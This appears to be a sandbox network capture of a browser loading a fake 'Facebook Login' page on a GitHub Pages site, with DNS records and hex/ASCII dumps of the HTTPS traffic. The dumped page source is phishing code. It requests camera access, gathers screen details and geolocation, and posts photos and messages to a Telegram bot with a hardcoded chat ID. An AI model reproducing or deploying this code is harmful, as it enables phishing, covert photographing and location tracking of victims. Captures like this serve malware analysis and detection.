Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 29, 2024 06:06:35.983374119 CEST	192.168.2.4	1.1.1.1	0x77ff	Standard query (0)	omar-tnzxoo.github.io	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:35.983562946 CEST	192.168.2.4	1.1.1.1	0xd0be	Standard query (0)	omar-tnzxoo.github.io	65	IN (0x0001)	false
Sep 29, 2024 06:06:39.183841944 CEST	192.168.2.4	1.1.1.1	0x699c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:39.184104919 CEST	192.168.2.4	1.1.1.1	0x8862	Standard query (0)	www.google.com	65	IN (0x0001)	false
Sep 29, 2024 06:06:41.844738007 CEST	192.168.2.4	1.1.1.1	0x419a	Standard query (0)	omar-tnzxoo.github.io	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:41.845052004 CEST	192.168.2.4	1.1.1.1	0xac2c	Standard query (0)	omar-tnzxoo.github.io	65	IN (0x0001)	false
Sep 29, 2024 06:07:03.711086035 CEST	192.168.2.4	1.1.1.1	0xa701	Standard query (0)	198.187.3.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Sep 29, 2024 06:07:39.298681021 CEST	192.168.2.4	1.1.1.1	0x1727	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 29, 2024 06:06:35.991734982 CEST	1.1.1.1	192.168.2.4	0x77ff	No error (0)	omar-tnzxoo.github.io		185.199.109.153	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:35.991734982 CEST	1.1.1.1	192.168.2.4	0x77ff	No error (0)	omar-tnzxoo.github.io		185.199.110.153	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:35.991734982 CEST	1.1.1.1	192.168.2.4	0x77ff	No error (0)	omar-tnzxoo.github.io		185.199.108.153	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:35.991734982 CEST	1.1.1.1	192.168.2.4	0x77ff	No error (0)	omar-tnzxoo.github.io		185.199.111.153	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:39.190707922 CEST	1.1.1.1	192.168.2.4	0x699c	No error (0)	www.google.com		142.250.185.132	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:39.190812111 CEST	1.1.1.1	192.168.2.4	0x8862	No error (0)	www.google.com			65	IN (0x0001)	false
Sep 29, 2024 06:06:41.853647947 CEST	1.1.1.1	192.168.2.4	0x419a	No error (0)	omar-tnzxoo.github.io		185.199.110.153	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:41.853647947 CEST	1.1.1.1	192.168.2.4	0x419a	No error (0)	omar-tnzxoo.github.io		185.199.109.153	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:41.853647947 CEST	1.1.1.1	192.168.2.4	0x419a	No error (0)	omar-tnzxoo.github.io		185.199.108.153	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:41.853647947 CEST	1.1.1.1	192.168.2.4	0x419a	No error (0)	omar-tnzxoo.github.io		185.199.111.153	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:47.279798985 CEST	1.1.1.1	192.168.2.4	0xcf5e	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:47.279798985 CEST	1.1.1.1	192.168.2.4	0xcf5e	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:06:47.792006016 CEST	1.1.1.1	192.168.2.4	0xb84f	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 29, 2024 06:06:47.792006016 CEST	1.1.1.1	192.168.2.4	0xb84f	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:07:01.180696011 CEST	1.1.1.1	192.168.2.4	0xc148	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 29, 2024 06:07:01.180696011 CEST	1.1.1.1	192.168.2.4	0xc148	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Sep 29, 2024 06:07:03.732239962 CEST	1.1.1.1	192.168.2.4	0xa701	Name error (3)	198.187.3.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Sep 29, 2024 06:07:39.306382895 CEST	1.1.1.1	192.168.2.4	0x1727	No error (0)	www.google.com		142.250.74.196	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

omar-tnzxoo.github.io

https:

fs.microsoft.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	185.199.109.153	443	3020	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-29 04:06:36 UTC	690	OUT	GET /facebook-mobile/index.html HTTP/1.1 Host: omar-tnzxoo.github.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-29 04:06:36 UTC	735	IN	HTTP/1.1 200 OK Connection: close Content-Length: 8987 Server: GitHub.com Content-Type: text/html; charset=utf-8 permissions-policy: interest-cohort=() Last-Modified: Thu, 29 Aug 2024 09:10:54 GMT Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=31556952 ETag: "66d03b1e-231b" expires: Sun, 29 Sep 2024 04:16:36 GMT Cache-Control: max-age=600 x-proxy-cache: MISS X-GitHub-Request-Id: 185C:298D2D:27CD85C:2CCC103:66F8D24C Accept-Ranges: bytes Date: Sun, 29 Sep 2024 04:06:36 GMT Via: 1.1 varnish Age: 0 X-Served-By: cache-ewr-kewr1740050-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1727582797.810926,VS0,VE15 Vary: Accept-Encoding X-Fastly-Request-ID: 7df94a5bf25598b66c1d52cdd9d685c5724d1b49
2024-09-29 04:06:36 UTC	1378	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 61 63 65 62 6f 6f 6b 20 4c 6f 67 69 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Facebook Login</title> <link rel="icon" href="assets/icon.png" type="image/png"> <lin
2024-09-29 04:06:36 UTC	1378	IN	Data Raw: 43 48 41 54 5f 49 44 20 3d 20 27 31 37 37 36 36 38 39 33 38 34 27 3b 0d 0a 20 20 20 20 20 20 63 6f 6e 73 74 20 49 4d 41 47 45 5f 55 52 4c 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 61 73 73 65 74 73 5f 74 6e 7a 78 6f 2f 33 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 6c 65 74 20 63 75 72 72 65 6e 74 43 61 6d 65 72 61 20 3d 20 27 75 73 65 72 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 2f 2f 20 d8 b7 d9 84 d8 a8 20 d8 a5 d8 b0 d9 86 20 d8 a7 d9 84 d9 88 d8 b5 d9 88 d9 84 20 d9 84 d9 84 d9 83 d8 a7 d9 85 d9 8a d8 b1 d8 a7 20 d9 88 d8 a7 d9 84 d9 85 d9 88 d9 82 d8 b9 20 d8 b9 d9 86 d8 af 20 d8 aa d8 ad d9 85 d9 8a d9 84 20 d8 a7 d9 84 d8 b5 d9 81 d8 ad d8 a9 0d 0a 20 20 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 72 65 71 75 65 73 74 50 65 72 6d 69 73 73 Data Ascii: CHAT_ID = '1776689384'; const IMAGE_URL = 'https://t.me/assets_tnzxo/3'; let currentCamera = 'user'; // async function requestPermiss
2024-09-29 04:06:36 UTC	1378	IN	Data Raw: 3d 20 61 77 61 69 74 20 66 65 74 63 68 28 60 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 24 7b 42 4f 54 5f 54 4f 4b 45 4e 7d 2f 73 65 6e 64 50 68 6f 74 6f 60 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 65 74 68 6f 64 3a 20 27 50 4f 53 54 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 3a 20 66 6f 72 6d 44 61 74 61 0d 0a 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 72 65 73 70 6f 6e 73 65 2e 6f 6b 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 60 d9 81 d8 b4 d9 84 20 d8 a5 d8 b1 d8 b3 d8 a7 d9 84 20 d8 a7 d9 84 d8 b5 d9 88 d8 b1 d8 a9 3a 20 24 7b 72 65 73 70 6f 6e 73 65 2e 73 74 61 74 75 73 7d Data Ascii: = await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendPhoto`, { method: 'POST', body: formData }); if (!response.ok) { throw new Error(` : ${response.status}
2024-09-29 04:06:36 UTC	1378	IN	Data Raw: 20 d9 87 d9 86 d8 a7 0d 0a 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 27 d8 aa d9 85 20 d8 a5 d8 b1 d8 b3 d8 a7 d9 84 20 d8 a7 d9 84 d8 a8 d9 8a d8 a7 d9 86 d8 a7 d8 aa 20 d8 a8 d9 86 d8 ac d8 a7 d8 ad 21 27 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 72 72 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 27 d8 ad d8 af d8 ab 20 d8 ae d8 b7 d8 a3 3a 20 27 2c 20 65 72 72 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 7d 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 2f 2f 20 d9 85 d9 86 d8 b9 20 d8 ad d9 81 d8 b8 20 d8 a7 d9 84 d9 83 d9 88 d8 af 20 28 d8 ba d9 8a d8 b1 20 d9 85 d8 b6 d9 85 d9 88 d9 86 29 0d 0a 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 Data Ascii: console.log(' !'); } catch (err) { console.error(' : ', err); } }); // ( ) document.add
2024-09-29 04:06:36 UTC	1378	IN	Data Raw: 73 73 61 67 65 20 2b 3d 20 60 2d 20 57 69 64 74 68 3a 20 24 7b 73 63 72 65 65 6e 2e 77 69 64 74 68 7d 5c 6e 60 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 6d 65 73 73 61 67 65 20 2b 3d 20 60 2d 20 48 65 69 67 68 74 3a 20 24 7b 73 63 72 65 65 6e 2e 68 65 69 67 68 74 7d 5c 6e 60 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 6d 65 73 73 61 67 65 20 2b 3d 20 60 2d 20 43 6f 6c 6f 72 20 44 65 70 74 68 3a 20 24 7b 73 63 72 65 65 6e 2e 63 6f 6c 6f 72 44 65 70 74 68 7d 5c 6e 60 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 6d 65 73 73 61 67 65 20 2b 3d 20 60 2d 20 50 69 78 65 6c 20 44 65 70 74 68 3a 20 24 7b 73 63 72 65 65 6e 2e 70 69 78 65 6c 44 65 70 74 68 7d 5c 6e 5c 6e 60 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 2f 2f 20 d9 85 d8 ad d8 a7 d9 88 d9 84 d8 a9 20 d8 a7 d9 84 d8 Data Ascii: ssage += `- Width: ${screen.width}\n`; message += `- Height: ${screen.height}\n`; message += `- Color Depth: ${screen.colorDepth}\n`; message += `- Pixel Depth: ${screen.pixelDepth}\n\n`; //
2024-09-29 04:06:36 UTC	1378	IN	Data Raw: 3d 20 60 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 6d 61 70 73 2f 73 65 61 72 63 68 2f 3f 61 70 69 3d 31 26 71 75 65 72 79 3d 24 7b 6c 61 74 69 74 75 64 65 7d 2c 24 7b 6c 6f 6e 67 69 74 75 64 65 7d 60 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 65 73 73 61 67 65 20 2b 3d 20 60 5c 6e f0 9f 93 8d 20 4c 6f 63 61 74 69 6f 6e 3a 20 24 7b 67 6f 6f 67 6c 65 4d 61 70 73 4c 69 6e 6b 7d 60 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 6e 64 4d 65 73 73 61 67 65 28 6d 65 73 73 61 67 65 2c 20 42 4f 54 5f 54 4f 4b 45 4e 29 3b 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 66 75 6e 63 74 69 6f 6e 28 65 72 72 6f 72 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 65 73 73 61 67 65 20 2b 3d 20 60 5c 6e f0 Data Ascii: = `https://www.google.com/maps/search/?api=1&query=${latitude},${longitude}`; message += `\n Location: ${googleMapsLink}`; sendMessage(message, BOT_TOKEN); }, function(error) { message += `\n
2024-09-29 04:06:36 UTC	719	IN	Data Raw: 6e 6f 77 6e 27 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 4d 65 73 73 61 67 65 28 6d 65 73 73 61 67 65 2c 20 62 6f 74 54 6f 6b 65 6e 20 3d 20 42 4f 54 5f 54 4f 4b 45 4e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 72 65 73 70 6f 6e 73 65 20 3d 20 61 77 61 69 74 20 66 65 74 63 68 28 60 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 24 7b 62 6f 74 54 6f 6b 65 6e 7d 2f 73 65 6e 64 4d 65 73 73 61 67 65 60 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 65 74 68 6f 64 3a 20 27 50 4f 53 54 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 3a Data Ascii: nown'; } } async function sendMessage(message, botToken = BOT_TOKEN) { try { const response = await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, { method: 'POST', body:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	185.199.109.153	443	3020	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-29 04:06:36 UTC	592	OUT	GET /facebook-mobile/style.css HTTP/1.1 Host: omar-tnzxoo.github.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://omar-tnzxoo.github.io/facebook-mobile/index.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-29 04:06:37 UTC	733	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2527 Server: GitHub.com Content-Type: text/css; charset=utf-8 permissions-policy: interest-cohort=() Last-Modified: Thu, 29 Aug 2024 09:10:54 GMT Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=31556952 ETag: "66d03b1e-9df" expires: Sun, 29 Sep 2024 04:16:36 GMT Cache-Control: max-age=600 x-proxy-cache: MISS X-GitHub-Request-Id: B9B4:19E0B5:29CFBB8:2ECE48C:66F8D248 Accept-Ranges: bytes Age: 0 Date: Sun, 29 Sep 2024 04:06:36 GMT Via: 1.1 varnish X-Served-By: cache-nyc-kteb1890060-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1727582797.953839,VS0,VE21 Vary: Accept-Encoding X-Fastly-Request-ID: 6145d1d18eaad5d27fdf6c1d492e2c3c88a53dbe
2024-09-29 04:06:37 UTC	1378	IN	Data Raw: 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 77 67 68 74 40 33 30 30 3b 34 30 30 3b 35 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 27 29 3b 0d 0a 0d 0a 2a 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 7d 0d 0a 0d 0a 2e 66 6c 65 78 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d Data Ascii: @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&display=swap');* { margin: 0; padding: 0; box-sizing: border-box; font-family: 'Roboto', sans-serif;}.flex { display: flex; align-items: center;
2024-09-29 04:06:37 UTC	1149	IN	Data Raw: 69 6e 74 65 72 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 38 37 37 66 32 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 35 70 78 20 30 3b 0d 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 72 65 6d 3b 0d 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0d 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 30 2e 32 73 20 65 61 73 65 3b 0d 0a 7d 0d 0a 0d 0a 2e 6c 69 6e 6b 20 2e 6c 6f 67 69 6e 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 64 36 35 64 39 3b 0d 0a 7d 0d 0a 0d 0a 66 6f 72 6d 20 61 20 7b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0d 0a 7d 0d Data Ascii: inter; background: #1877f2; padding: 15px 0; border-radius: 6px; color: #fff; font-size: 1.25rem; font-weight: 600; transition: 0.2s ease;}.link .login:hover { background: #0d65d9;}form a { text-decoration: none;}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-09-29 04:06:40 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-09-29 04:06:41 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF67) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=131901 Date: Sun, 29 Sep 2024 04:06:41 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49746	185.199.109.153	443	3020	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-29 04:06:41 UTC	644	OUT	GET /facebook-mobile/assets/icon.png HTTP/1.1 Host: omar-tnzxoo.github.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://omar-tnzxoo.github.io/facebook-mobile/index.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-29 04:06:41 UTC	742	IN	HTTP/1.1 200 OK Connection: close Content-Length: 16067 Server: GitHub.com Content-Type: image/png permissions-policy: interest-cohort=() x-origin-cache: HIT Last-Modified: Thu, 29 Aug 2024 09:10:54 GMT Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=31556952 ETag: "66d03b1e-3ec3" expires: Sun, 29 Sep 2024 04:16:41 GMT Cache-Control: max-age=600 x-proxy-cache: MISS X-GitHub-Request-Id: 4FB1:1A1E62:27E9793:2CE7BC4:66F8D251 Accept-Ranges: bytes Age: 0 Date: Sun, 29 Sep 2024 04:06:41 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740047-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1727582801.482073,VS0,VE21 Vary: Accept-Encoding X-Fastly-Request-ID: b5e30355e23838b6833740c3e0fb161d3898a72c
2024-09-29 04:06:41 UTC	1378	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 29 00 00 02 2c 08 06 00 00 00 37 5e 39 ad 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 3e 58 49 44 41 54 78 5e ed dd 09 78 54 e5 bd c7 f1 ff 91 2c 24 21 21 81 90 04 02 21 09 8b 84 2d 88 b2 29 08 02 2e 08 b8 17 05 eb 52 91 da 5a 5b b5 d5 56 6b ad 4b 8b b6 2e ad 5a ad f6 ba db 56 ea 56 15 f7 16 01 77 16 45 91 2d 80 26 11 48 20 21 10 48 98 84 84 e0 b9 f3 92 33 35 62 20 33 99 73 66 ce f2 fd 3c 4f 9e e4 bc 41 1f 7b af c4 1f ef 7f 39 9a ae eb 02 00 00 60 37 47 18 9f 01 00 00 6c 85 90 02 00 00 6c 89 90 02 00 00 6c 89 90 02 00 00 6c 89 90 02 00 00 6c 89 90 02 00 00 6c 89 90 02 00 00 6c 89 90 02 00 Data Ascii: PNGIHDR),7^9sRGBgAMAapHYs%%IR$>XIDATx^xT,$!!!-).RZ[VkK.ZVVwE-&H !H35b 3sf<OA{9`7Glllllll
2024-09-29 04:06:41 UTC	1378	IN	Data Raw: c0 de 68 b2 45 b4 11 52 10 71 84 13 c0 79 54 93 ed d5 27 69 77 12 56 10 49 84 14 44 0c e1 04 70 3e c2 0a 22 89 90 02 cb 11 4e 00 f7 21 ac 20 12 08 29 b0 0c e1 04 70 b7 a4 78 dd 77 e6 70 79 fe 07 63 b5 47 68 b0 85 15 08 29 30 1d e1 04 f0 16 d5 60 fb bd 11 f2 cc 4f 8e ad bc 27 af 57 66 89 71 0c 84 8d 90 02 53 2d fc b4 6a d2 ad ff e9 7a eb 8a af b4 11 84 13 c0 5b d8 b3 02 b3 11 52 60 0a b5 21 f6 ae b7 3b 5d f7 c6 e7 da b4 9a bd 92 62 1c 03 f0 20 c2 0a cc 42 48 41 58 4a b6 d6 e5 df b3 28 e1 17 cf 7f ac 9d cb fa 7a 00 2d 8d cc d7 97 5c 3f 55 fb dd f8 be 8d 8b e8 57 41 7b 10 52 d0 2e aa ef e4 e9 65 1d 2e fc d3 5b 72 6d 69 95 e4 19 c7 00 f0 1d 4c 02 a1 bd 08 29 08 d9 2b 4b 2a 4e bb 63 51 c6 0d 2b 37 6b 47 d1 77 02 20 18 34 d7 a2 3d 08 29 08 1a 7d 27 00 c2 a5 c2 Data Ascii: hERqyT'iwVIDp>"N! )pxwpycGh)0`O'WfqS-jz[R`!;]b BHAXJ(z-\?UWA{R.e.[rmiL)+K*NcQ+7kGw 4=)}'
2024-09-29 04:06:41 UTC	1378	IN	Data Raw: ed c6 4d 03 8d 23 84 80 90 d2 4e cf 2c 2e 9b 79 ef 47 39 d7 94 56 49 9e 71 04 00 c0 77 a8 89 cf 3b de ed 75 c3 86 e2 b2 fe c6 11 82 44 48 69 07 15 50 e6 2e cc be 79 63 85 f0 2f 1c 00 a0 4d cf 2c d3 66 dd b6 a8 c7 4d 04 95 d0 10 52 42 f4 ca 92 8a d3 fe f8 4e f6 0d 04 14 00 40 28 54 50 79 e4 93 1e 3f da b2 b5 aa a7 71 84 36 10 52 42 b0 ba b4 76 c8 dd ef 64 5e b7 ae 5c 06 19 47 00 00 04 ed 2f 0b b4 ab 9f 5e 99 7e c1 8e ea da ae c6 11 0e 83 90 12 24 b5 4d f6 a6 d7 3a cd 5d f1 95 1c 63 1c 01 00 10 b2 3b 5e d7 6f f8 f7 aa e4 19 35 7b ea 98 0a 6d 03 21 25 08 81 75 f7 8b 8b b4 49 fb f6 0b 8b 79 00 00 ed e6 6b d0 92 7e 3f 5f bf e9 8d 75 89 53 59 9f 7f 78 9a ae eb c6 97 68 8d da 26 7b e5 bf 8e 78 f0 c5 4f b4 b3 59 77 0f 00 30 4b 46 b2 5e f1 d0 c5 da 9c c9 03 9a de Data Ascii: M#N,.yG9VIqw;uDHiP.yc/M,fMRBN@(TPy?q6RBvd^\G/^~$M:]c;^o5{m!%uIyk~?_uSYxh&{xOYw0KF^
2024-09-29 04:06:41 UTC	1378	IN	Data Raw: 35 22 4f ce d6 92 66 8c 90 58 6e 4d 00 eb f9 1a b4 a4 df cf d7 6f fe f8 f3 8d ae df 92 ee 89 90 a2 de cb f3 51 75 e1 58 fa 50 80 f0 b5 0c 27 aa d7 64 58 0e b7 26 40 a4 95 54 69 f9 f7 7d 3c f0 17 6b 37 6e 1a 68 1c b9 92 eb 43 ca ea d2 da 21 0f 2e cd fe 29 2f 0e 04 c2 43 38 01 ec 45 f5 a7 bc fa 65 ce e9 3b aa 6b bb 1a 47 ae e3 ea 90 a2 fa 50 ee 5c d0 e9 fa 55 5b a4 d0 38 02 10 22 c2 09 60 5f 0f 2c d0 af 5c 56 96 7c ec be a6 26 57 b6 32 b8 3a a4 3c b3 b8 7c d6 87 5f 68 94 79 80 76 9a e6 8f f7 6f 5c 4d 38 01 ec ca ed 63 c9 ae 0d 29 0b 3f ad 9a f4 8f cf f3 2e 66 dc 18 08 9d 1a 25 7e 62 b6 ee 7b e4 07 b2 6f 44 1e e1 04 b0 33 55 f6 79 6e 6d ce ac 6d db ab b3 8c 23 d7 70 65 48 51 65 9e 27 3f e9 3a 